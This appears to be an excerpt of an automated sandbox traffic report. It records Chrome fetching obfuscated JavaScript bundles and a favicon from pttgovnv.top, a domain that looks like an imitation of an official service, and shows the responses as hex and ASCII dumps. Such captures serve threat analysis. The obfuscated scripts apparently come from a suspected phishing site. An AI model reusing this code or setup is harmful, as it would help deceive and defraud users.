          2024-09-01 22:25:15 UTC601INData Raw: 31 32 36 34 0d 0a 63 6f 6e 73 74 20 61 31 36 5f 30 78 31 61 30 61 62 31 3d 61 31 36 5f 30 78 62 33 30 39 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 63 36 32 30 32 37 2c 5f 30 78 34 63 33 35 30 33 29 7b 63 6f 6e 73 74 20 5f 30 78 34 37 32 35 31 37 3d 61 31 36 5f 30 78 62 33 30 39 2c 5f 30 78 31 38 66 32 38 38 3d 5f 30 78 63 36 32 30 32 37 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 30 61 36 34 62 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 34 62 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 33 66 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 37 32 35 31 37 28 30 78 31 32 64 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78
          Data Ascii: 1264const a16_0x1a0ab1=a16_0xb309;(function(_0xc62027,_0x4c3503){const _0x472517=a16_0xb309,_0x18f288=_0xc62027();while(!![]){try{const _0x10a64b=parseInt(_0x472517(0x14b))/0x1+-parseInt(_0x472517(0x13f))/0x2+parseInt(_0x472517(0x12d))/0x3+-parseInt(_0x
          2024-09-01 22:25:15 UTC1369INData Raw: 7d 7d 7d 28 61 31 36 5f 30 78 34 36 38 31 2c 30 78 36 65 62 66 36 29 29 3b 63 6f 6e 73 74 20 61 31 36 5f 30 78 61 61 35 39 66 37 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 5f 30 78 34 31 30 62 64 31 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 65 35 63 30 37 2c 5f 30 78 33 31 63 63 34 35 29 7b 63 6f 6e 73 74 20 5f 30 78 35 63 32 31 65 37 3d 5f 30 78 34 31 30 62 64 31 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 61 61 36 61 36 3d 61 31 36 5f 30 78 62 33 30 39 3b 69 66 28 5f 30 78 33 31 63 63 34 35 29 7b 63 6f 6e 73 74 20 5f 30 78 32 31 66 34 32 38 3d 5f 30 78 33 31 63 63 34 35 5b 5f 30 78 33 61 61 36 61 36 28 30 78 31 32 34 29 5d 28 5f 30 78 33 65 35 63 30 37 2c 61 72 67 75 6d 65 6e 74 73 29 3b
          Data Ascii: }}}(a16_0x4681,0x6ebf6));const a16_0xaa59f7=(function(){let _0x410bd1=!![];return function(_0x3e5c07,_0x31cc45){const _0x5c21e7=_0x410bd1?function(){const _0x3aa6a6=a16_0xb309;if(_0x31cc45){const _0x21f428=_0x31cc45[_0x3aa6a6(0x124)](_0x3e5c07,arguments);
          2024-09-01 22:25:15 UTC1369INData Raw: 6d 70 6f 72 74 7b 63 20 61 73 20 61 31 36 5f 30 78 31 34 61 66 66 62 2c 62 20 61 73 20 61 31 36 5f 30 78 31 39 63 39 36 38 7d 66 72 6f 6d 27 2e 2f 33 37 64 38 65 62 33 31 4a 78 4b 6e 57 2e 6a 73 27 3b 63 6f 6e 73 74 20 6f 3d 64 6f 63 75 6d 65 6e 74 5b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 35 31 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 64 29 5d 28 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 64 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 36 29 29 3b 66 75 6e 63 74 69 6f 6e 20 61 31 36 5f 30 78 62 33 30 39 28 5f 30 78 31 31 63 64 63 35 2c 5f 30 78 33 33 66 61 37 61 29 7b 63 6f 6e 73 74 20 5f 30 78 31 31 38 66 33 63 3d 61 31 36 5f 30 78 34 36 38 31 28 29 3b 72 65 74 75 72 6e 20 61 31 36 5f 30 78 62 33 30 39 3d 66
          Data Ascii: mport{c as a16_0x14affb,b as a16_0x19c968}from'./37d8eb31JxKnW.js';const o=document[a16_0x1a0ab1(0x151)+a16_0x1a0ab1(0x14d)](a16_0x1a0ab1(0x13d)+a16_0x1a0ab1(0x136));function a16_0xb309(_0x11cdc5,_0x33fa7a){const _0x118f3c=a16_0x4681();return a16_0xb309=f
          2024-09-01 22:25:15 UTC1369INData Raw: 29 2c 5b 27 2e 2f 31 61 66 37 37 36 63 66 27 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 39 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 33 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 35 30 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 37 29 2b 27 6b 46 47 79 6d 2e 63 73 73 27 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 63 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 39 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 33 31 29 2b 27 4a 78 4b 6e 57 2e 6a 73 27 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 65 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 34 39 29 2c 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31 32 63 29 2b 61 31 36 5f 30 78 31 61 30 61 62 31 28 30 78 31
          Data Ascii: ),['./1af776cf'+a16_0x1a0ab1(0x149),a16_0x1a0ab1(0x133)+a16_0x1a0ab1(0x150),a16_0x1a0ab1(0x147)+'kFGym.css',a16_0x1a0ab1(0x14c)+a16_0x1a0ab1(0x149),a16_0x1a0ab1(0x131)+'JxKnW.js',a16_0x1a0ab1(0x14e)+a16_0x1a0ab1(0x149),a16_0x1a0ab1(0x12c)+a16_0x1a0ab1(0x1
          2024-09-01 22:25:15 UTC8INData Raw: 61 75 6c 74 7d 3b 0d 0a
          Data Ascii: ault};
          2024-09-01 22:25:15 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          5192.168.2.449742172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:15 UTC532OUTGET /help/assets/37d8eb31JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://pttgovnv.top
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: script
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:15 UTC762INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:15 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"cf70-18fc3d84650"
          CF-Cache-Status: HIT
          Age: 37057
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RFIm%2BPgXawRbXuBdYAGBtwciX4GTrKr6ga%2F4aGunQD44BOyhMegi%2FObCYgcdItwnOl7DAAtEZD%2BmIq8xHCMpcu0Uj%2BPUJ5DuYRcIGYaZNy63TMEuKpuBR9jsNqO5Qts%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acd65d31178c-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:15 UTC607INData Raw: 37 63 62 36 0d 0a 63 6f 6e 73 74 20 61 39 5f 30 78 31 33 64 30 32 33 3d 61 39 5f 30 78 33 36 34 37 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 63 30 66 34 63 2c 5f 30 78 35 62 34 66 37 65 29 7b 63 6f 6e 73 74 20 5f 30 78 31 38 63 30 65 33 3d 61 39 5f 30 78 33 36 34 37 2c 5f 30 78 33 35 64 30 39 63 3d 5f 30 78 31 63 30 66 34 63 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 61 38 30 38 39 35 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 66 62 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 31 32 65 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38 63 30 65 33 28 30 78 31 39 63 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 38
          Data Ascii: 7cb6const a9_0x13d023=a9_0x3647;(function(_0x1c0f4c,_0x5b4f7e){const _0x18c0e3=a9_0x3647,_0x35d09c=_0x1c0f4c();while(!![]){try{const _0xa80895=-parseInt(_0x18c0e3(0xfb))/0x1*(parseInt(_0x18c0e3(0x12e))/0x2)+parseInt(_0x18c0e3(0x19c))/0x3+-parseInt(_0x18
          2024-09-01 22:25:15 UTC1369INData Raw: 68 27 5d 28 5f 30 78 33 35 64 30 39 63 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 39 5f 30 78 35 34 30 33 2c 30 78 35 61 36 32 36 29 29 3b 69 6d 70 6f 72 74 7b 73 20 61 73 20 61 39 5f 30 78 33 30 66 39 64 37 2c 75 20 61 73 20 61 39 5f 30 78 31 66 33 62 30 36 2c 78 20 61 73 20 61 39 5f 30 78 32 65 65 33 64 31 2c 72 20 61 73 20 61 39 5f 30 78 34 63 37 30 62 63 2c 6e 20 61 73 20 61 39 5f 30 78 38 30 33 61 35 62 2c 79 20 61 73 20 61 39 5f 30 78 33 65 36 30 61 34 2c 64 20 61 73 20 61 39 5f 30 78 32 35 35 63 63 33 2c 7a 20 61 73 20 61 39 5f 30 78 34 36 31 36 35 63 2c 41 20 61 73 20 61 39 5f 30 78 32 62 33 63 64 37 2c 61 20 61 73 20 61 39 5f 30 78 35 61 34 38 36 32 2c 77 20 61 73 20 61 39 5f 30 78 32 37 33 34 39 36 7d 66 72 6f 6d 27 2e 2f 69 6e 64 65
          Data Ascii: h'](_0x35d09c['shift']());}}}(a9_0x5403,0x5a626));import{s as a9_0x30f9d7,u as a9_0x1f3b06,x as a9_0x2ee3d1,r as a9_0x4c70bc,n as a9_0x803a5b,y as a9_0x3e60a4,d as a9_0x255cc3,z as a9_0x46165c,A as a9_0x2b3cd7,a as a9_0x5a4862,w as a9_0x273496}from'./inde
          2024-09-01 22:25:15 UTC1369INData Raw: 34 3d 5f 30 78 32 39 36 63 64 37 28 5f 30 78 35 63 62 37 36 38 29 29 2c 5f 30 78 35 34 66 38 35 64 3e 2d 30 78 31 26 26 28 5f 30 78 35 36 66 30 33 30 3d 5f 30 78 35 36 66 30 33 30 7c 7c 5f 30 78 32 33 36 64 35 35 5b 5f 30 78 34 38 39 66 32 63 28 30 78 31 31 31 29 5d 28 30 78 30 2c 5f 30 78 35 34 66 38 35 64 29 2c 5f 30 78 35 62 38 37 62 32 3d 5f 30 78 32 33 36 64 35 35 5b 27 73 6c 69 63 65 27 5d 28 5f 30 78 35 34 66 38 35 64 2c 5f 30 78 32 33 36 64 35 35 5b 5f 30 78 34 38 39 66 32 63 28 30 78 31 33 30 29 5d 29 29 2c 5f 30 78 35 36 66 30 33 30 3d 61 74 28 5f 30 78 35 36 66 30 33 30 21 3d 6e 75 6c 6c 3f 5f 30 78 35 36 66 30 33 30 3a 5f 30 78 32 33 36 64 35 35 2c 5f 30 78 35 33 61 32 36 66 29 2c 7b 27 66 75 6c 6c 50 61 74 68 27 3a 5f 30 78 35 36 66 30 33 30
          Data Ascii: 4=_0x296cd7(_0x5cb768)),_0x54f85d>-0x1&&(_0x56f030=_0x56f030||_0x236d55[_0x489f2c(0x111)](0x0,_0x54f85d),_0x5b87b2=_0x236d55['slice'](_0x54f85d,_0x236d55[_0x489f2c(0x130)])),_0x56f030=at(_0x56f030!=null?_0x56f030:_0x236d55,_0x53a26f),{'fullPath':_0x56f030
          2024-09-01 22:25:15 UTC1369INData Raw: 39 37 37 29 69 66 28 21 69 74 28 5f 30 78 31 63 66 39 37 37 5b 5f 30 78 35 63 34 65 37 38 5d 2c 5f 30 78 31 30 31 34 38 63 5b 5f 30 78 35 63 34 65 37 38 5d 29 29 72 65 74 75 72 6e 21 30 78 31 3b 72 65 74 75 72 6e 21 30 78 30 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 39 5f 30 78 35 34 30 33 28 29 7b 63 6f 6e 73 74 20 5f 30 78 34 30 33 66 64 33 3d 5b 27 6d 65 73 73 61 67 65 27 2c 27 61 63 6b 73 27 2c 27 6c 69 73 74 65 6e 27 2c 27 69 6e 63 6c 75 64 65 73 27 2c 27 43 6c 61 73 73 27 2c 27 32 35 32 34 39 32 33 67 46 79 50 65 41 27 2c 27 62 69 6e 64 27 2c 27 73 68 69 66 74 4b 65 79 27 2c 27 65 72 74 69 65 73 27 2c 27 73 74 61 74 65 27 2c 27 63 75 72 72 65 6e 74 54 61 72 27 2c 27 70 6f 73 69 74 69 6f 6e 27 2c 27 62 65 66 6f 72 65 52 6f 75 74 27 2c 27 2e 5c 78 32 30 65
          Data Ascii: 977)if(!it(_0x1cf977[_0x5c4e78],_0x10148c[_0x5c4e78]))return!0x1;return!0x0;}function a9_0x5403(){const _0x403fd3=['message','acks','listen','includes','Class','2524923gFyPeA','bind','shiftKey','erties','state','currentTar','position','beforeRout','.\x20e
          2024-09-01 22:25:15 UTC1369INData Raw: 6d 70 6f 6e 65 6e 74 73 27 2c 27 74 68 5c 78 32 30 5c 78 32 32 27 2c 27 28 3f 3a 2f 7c 24 29 27 2c 27 73 65 61 72 63 68 27 2c 27 24 72 6f 75 74 65 27 2c 27 65 73 6f 6c 76 65 5c 78 32 30 63 6f 6d 27 2c 27 5c 78 32 32 5c 78 32 30 28 27 2c 27 6c 69 73 74 27 2c 27 74 6f 72 27 2c 27 73 70 6c 69 63 65 27 2c 27 61 6c 69 61 73 27 2c 27 69 6e 73 74 61 6e 63 65 73 27 2c 27 66 75 6e 63 74 69 6f 6e 27 2c 27 6f 72 61 74 69 6f 6e 27 2c 27 75 6e 73 68 69 66 74 27 2c 27 5b 5e 2f 5d 2b 3f 27 2c 27 64 75 70 6c 69 63 61 74 65 64 27 2c 27 6e 61 76 69 67 61 74 65 27 2c 27 73 70 6c 69 74 27 2c 27 69 73 45 78 61 63 74 41 63 74 27 2c 27 6d 61 6e 75 61 6c 27 2c 27 65 6e 74 65 72 43 61 6c 6c 62 27 2c 27 5f 5f 76 63 63 4f 70 74 73 27 2c 27 73 69 7a 65 27 2c 27 61 75 6c 74 27 2c 27
          Data Ascii: mponents','th\x20\x22','(?:/|$)','search','$route','esolve\x20com','\x22\x20(','list','tor','splice','alias','instances','function','oration','unshift','[^/]+?','duplicated','navigate','split','isExactAct','manual','enterCallb','__vccOpts','size','ault','
          2024-09-01 22:25:15 UTC1369INData Raw: 30 32 33 3b 72 65 74 75 72 6e 20 4e 28 5f 30 78 34 31 39 33 33 61 29 3f 5f 30 78 34 35 61 65 61 34 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 33 30 29 5d 3d 3d 3d 5f 30 78 34 31 39 33 33 61 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 33 30 29 5d 26 26 5f 30 78 34 35 61 65 61 34 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 39 32 29 5d 28 28 5f 30 78 31 63 64 36 66 63 2c 5f 30 78 31 61 32 35 64 37 29 3d 3e 5f 30 78 31 63 64 36 66 63 3d 3d 3d 5f 30 78 34 31 39 33 33 61 5b 5f 30 78 31 61 32 35 64 37 5d 29 3a 5f 30 78 34 35 61 65 61 34 5b 5f 30 78 31 33 36 64 34 36 28 30 78 31 33 30 29 5d 3d 3d 3d 30 78 31 26 26 5f 30 78 34 35 61 65 61 34 5b 30 78 30 5d 3d 3d 3d 5f 30 78 34 31 39 33 33 61 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 74 28 5f 30 78 33 35 37 62 30 30 2c 5f 30
          Data Ascii: 023;return N(_0x41933a)?_0x45aea4[_0x136d46(0x130)]===_0x41933a[_0x136d46(0x130)]&&_0x45aea4[_0x136d46(0x192)]((_0x1cd6fc,_0x1a25d7)=>_0x1cd6fc===_0x41933a[_0x1a25d7]):_0x45aea4[_0x136d46(0x130)]===0x1&&_0x45aea4[0x0]===_0x41933a;}function at(_0x357b00,_0
          2024-09-01 22:25:15 UTC1369INData Raw: 38 37 31 28 30 78 31 63 39 29 2b 27 72 27 5d 28 5f 30 78 61 35 61 32 66 37 29 5b 5f 30 78 35 61 62 38 37 31 28 30 78 31 35 33 29 5d 28 27 28 28 28 2e 2b 29 2b 29 2b 29 27 2b 27 2b 24 27 29 3b 7d 29 3b 5f 30 78 61 35 61 32 66 37 28 29 2c 28 5f 30 78 31 36 37 66 39 33 5b 27 70 6f 70 27 5d 3d 5f 30 78 36 34 66 35 36 64 28 30 78 31 37 66 29 2c 5f 30 78 31 36 37 66 39 33 5b 5f 30 78 36 34 66 35 36 64 28 30 78 31 37 35 29 5d 3d 27 70 75 73 68 27 29 3b 7d 28 59 7c 7c 28 59 3d 7b 7d 29 29 29 3b 76 61 72 20 5a 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 31 61 33 64 63 29 7b 63 6f 6e 73 74 20 5f 30 78 62 37 31 61 39 36 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 5f 30 78 32 31 61 33 64 63 5b 5f 30 78 62 37 31 61 39 36 28 30 78 31 39 34 29 5d 3d 5f 30 78 62 37 31 61 39
          Data Ascii: 871(0x1c9)+'r'](_0xa5a2f7)[_0x5ab871(0x153)]('(((.+)+)+)'+'+$');});_0xa5a2f7(),(_0x167f93['pop']=_0x64f56d(0x17f),_0x167f93[_0x64f56d(0x175)]='push');}(Y||(Y={})));var Z;(function(_0x21a3dc){const _0xb71a96=a9_0x13d023;_0x21a3dc[_0xb71a96(0x194)]=_0xb71a9
          2024-09-01 22:25:15 UTC1369INData Raw: 35 62 64 61 32 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 6c 65 74 20 5f 30 78 34 31 35 62 65 32 3b 69 66 28 27 65 6c 27 69 6e 20 5f 30 78 34 37 35 34 65 34 29 7b 63 6f 6e 73 74 20 5f 30 78 34 35 39 39 62 62 3d 5f 30 78 34 37 35 34 65 34 5b 27 65 6c 27 5d 2c 5f 30 78 32 34 38 36 36 64 3d 74 79 70 65 6f 66 20 5f 30 78 34 35 39 39 62 62 3d 3d 5f 30 78 35 35 62 64 61 32 28 30 78 31 33 38 29 26 26 5f 30 78 34 35 39 39 62 62 5b 5f 30 78 35 35 62 64 61 32 28 30 78 66 30 29 5d 28 27 23 27 29 2c 5f 30 78 33 61 39 30 37 39 3d 74 79 70 65 6f 66 20 5f 30 78 34 35 39 39 62 62 3d 3d 27 73 74 72 69 6e 67 27 3f 5f 30 78 32 34 38 36 36 64 3f 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 35 62 64 61 32 28 30 78 31 34 65 29 2b 5f 30 78 35 35 62 64 61 32 28 30 78 31 31 63 29 5d 28 5f
          Data Ascii: 5bda2=a9_0x13d023;let _0x415be2;if('el'in _0x4754e4){const _0x4599bb=_0x4754e4['el'],_0x24866d=typeof _0x4599bb==_0x55bda2(0x138)&&_0x4599bb[_0x55bda2(0xf0)]('#'),_0x3a9079=typeof _0x4599bb=='string'?_0x24866d?document[_0x55bda2(0x14e)+_0x55bda2(0x11c)](_
          2024-09-01 22:25:15 UTC1369INData Raw: 70 6c 69 63 65 27 5d 28 5f 30 78 33 62 34 62 30 37 29 2c 5f 30 78 35 35 31 39 38 38 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 38 39 30 65 38 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 63 38 34 62 34 28 5f 30 78 32 66 63 32 31 66 2c 5f 30 78 32 35 64 62 61 64 2c 7b 64 69 72 65 63 74 69 6f 6e 3a 5f 30 78 35 64 64 30 30 38 2c 64 65 6c 74 61 3a 5f 30 78 33 66 35 33 31 34 7d 29 7b 63 6f 6e 73 74 20 5f 30 78 35 62 31 32 66 35 3d 61 39 5f 30 78 33 36 34 37 2c 5f 30 78 33 61 63 33 65 62 3d 7b 27 64 69 72 65 63 74 69 6f 6e 27 3a 5f 30 78 35 64 64 30 30 38 2c 27 64 65 6c 74 61 27 3a 5f 30 78 33 66 35 33 31 34 2c 27 74 79 70 65 27 3a 59 5b 5f 30 78 35 62 31 32 66 35 28 30 78 31 37 66 29 5d 7d 3b 66 6f 72 28 63 6f 6e 73 74 20 5f 30 78 33 36 36 33 64 62 20 6f 66 20
          Data Ascii: plice'](_0x3b4b07),_0x551988['push'](_0x3890e8);}function _0x3c84b4(_0x2fc21f,_0x25dbad,{direction:_0x5dd008,delta:_0x3f5314}){const _0x5b12f5=a9_0x3647,_0x3ac3eb={'direction':_0x5dd008,'delta':_0x3f5314,'type':Y[_0x5b12f5(0x17f)]};for(const _0x3663db of
          2024-09-01 22:25:15 UTC1369INData Raw: 74 28 5f 30 78 35 63 32 31 30 32 29 7b 63 6f 6e 73 74 20 5f 30 78 61 33 66 36 66 34 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 5f 30 78 35 63 32 31 30 32 3d 3d 5f 30 78 61 33 66 36 66 34 28 30 78 31 33 38 29 7c 7c 5f 30 78 35 63 32 31 30 32 26 26 74 79 70 65 6f 66 20 5f 30 78 35 63 32 31 30 32 3d 3d 5f 30 78 61 33 66 36 66 34 28 30 78 31 30 33 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 47 65 28 5f 30 78 66 62 37 38 35 39 29 7b 63 6f 6e 73 74 20 5f 30 78 35 61 32 65 33 32 3d 61 39 5f 30 78 31 33 64 30 32 33 3b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 5f 30 78 66 62 37 38 35 39 3d 3d 5f 30 78 35 61 32 65 33 32 28 30 78 31 33 38 29 7c 7c 74 79 70 65 6f 66 20 5f 30 78 66 62 37 38 35 39 3d 3d 5f 30 78 35 61 32 65 33 32 28 30 78
          Data Ascii: t(_0x5c2102){const _0xa3f6f4=a9_0x13d023;return typeof _0x5c2102==_0xa3f6f4(0x138)||_0x5c2102&&typeof _0x5c2102==_0xa3f6f4(0x103);}function Ge(_0xfb7859){const _0x5a2e32=a9_0x13d023;return typeof _0xfb7859==_0x5a2e32(0x138)||typeof _0xfb7859==_0x5a2e32(0x


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          6192.168.2.449744172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:15 UTC585OUTGET /favicon.ico HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:15 UTC741INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:15 GMT
          Content-Type: image/vnd.microsoft.icon
          Content-Length: 15215
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"3b6f-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 37492
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bKv3Z7NMpXxEqU263xoJ9dehNZSsWTxpsgtt%2FYwY%2BizYNQxOI1oQp37GIkS9JlUluRycJU2U%2BcH1ZbzAZOY8%2FBGosbmTDtxEu9nV9gy2sKKcnoj4AGiYDQrmyswrAFE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acd65a160f46-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:15 UTC628INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 4e 00 00 01 5f 08 06 00 00 00 b8 3b 43 56 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 00 21 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 32 30 31 38 3a 30 39 3a 30 37 20 30 39 3a 31 36 3a 30 36 44 2f 69 55 00 00 3a b2 49 44 41 54 78 5e ed dd cf 76 54 c7 d5 f7 f1 aa d3 b6 61 f6 38 57 00 99 07 68 0d 13 c8 8a 7c 05 96 27 59 30 8a 7c 05 b4 af c0 e2 0a 10 57 60 79 84 56 26 16 57 e0 f6 0a 24 43 35 90 79 c4 15 bc 78 06 d8 7d ea ad 5d 55 2d 09 a1 3f 7d fe 57 d5 f9 7e d6 b2 e1 b4
          Data Ascii: PNGIHDRN_;CVsRGBgAMAapHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<!tEXtCreation Time2018:09:07 09:16:06D/iU:IDATx^vTa8Wh|'Y0|W`yV&W$C5yx}]U-?}W~
          2024-09-01 22:25:15 UTC1369INData Raw: 59 a8 62 b2 a0 c9 1c 00 e2 41 70 02 6a aa db ef 54 95 ab 4a 29 bd 20 4c 01 c0 f0 08 4e 40 03 e6 c5 9f b6 8c 2a 7e 0a 97 bd f2 95 29 65 03 94 39 2a ca 62 ae 7e 57 0b 1a cf 01 a0 5b 04 27 a0 a1 75 e6 3b f5 e9 93 40 f5 99 3a a2 42 05 00 ed 20 38 01 2d 58 be b8 7d 60 3f 4c 5f 87 cb 28 85 40 f5 d6 fe 6e e1 96 fc ca c9 5b fd d7 97 f3 f0 8f 01 00 6b 20 38 01 2d e8 b2 59 bc 6b ee b8 18 a5 8f a4 87 4a db 60 a5 97 c5 82 65 3f 00 38 1f c1 09 68 49 5f cd e2 7d 39 6e 4a 57 36 44 15 e6 88 40 05 00 04 27 a0 55 72 18 70 a9 ca 79 2e e1 e9 3c 04 2a 00 63 46 70 02 5a d6 74 b2 78 aa 3e 1a 9b 60 a4 39 bd 58 30 d0 13 40 6e 08 4e 40 07 c6 1a 9e ce e3 8f 98 51 36 40 31 36 01 40 fa 08 4e 40 47 da 3a 96 25 47 ae 21 5d cb 72 9f 59 10 a6 00 a4 84 e0 04 74 88 f0 b4 3e c2 14 80 14 10
          Data Ascii: YbApjTJ) LN@*~)e9*b~W['u;@:B 8-X}`?L_(@n[k 8-YkJ`e?8hI_}9nJW6D@'Urpy.<*cFpZtx>`9X0@nN@Q6@16@N@G:%G!]rYt>
          2024-09-01 22:25:15 UTC1369INData Raw: 7a af 98 e8 5d 76 e4 21 27 04 27 00 ad 56 9f 44 aa 01 4a b8 7e a8 a5 99 d9 df 49 3f 14 4b 79 2d 70 15 49 5d ee 72 d8 30 72 40 70 02 e0 b4 5d 7d 12 f6 86 f9 a4 f8 cd 06 a8 44 97 6c 58 ca 6b 97 6c 2a d0 85 da d5 ef 8b 3d 96 f1 90 2a 82 13 80 8f b4 5e 7d 5a cd 80 4a 78 88 e2 f1 52 5e a9 66 f6 e7 c2 ae bc 86 8e 9b c9 13 ad 4a 62 dc 08 4e 00 3e d1 45 f5 49 a4 bc 84 b7 c2 ae bc 76 d9 f7 c4 b3 a2 d4 bb 1c ef 82 54 10 9c 00 5c 28 54 9f 76 db ae b2 e4 70 b3 94 70 e9 06 6c 2a bd dd 64 2a 3b 3c fb 9e 70 bb f1 98 4c 8e d8 11 9c 00 5c ca 55 9f 3e 37 3b 4d 0e 0c be 48 2e 4d c3 34 94 b7 87 3e 28 c4 8e e0 04 60 2d 61 89 4a 96 ef 5a df ae 2f 37 cb 54 8e 72 b9 8a 79 7e 6b 9b 2a 54 73 c7 bd 71 91 9f 8f 88 f1 21 38 01 a8 a4 fc f7 ad 99 29 6d c8 e9 a0 b2 22 01 ca 7e 2b ed e5
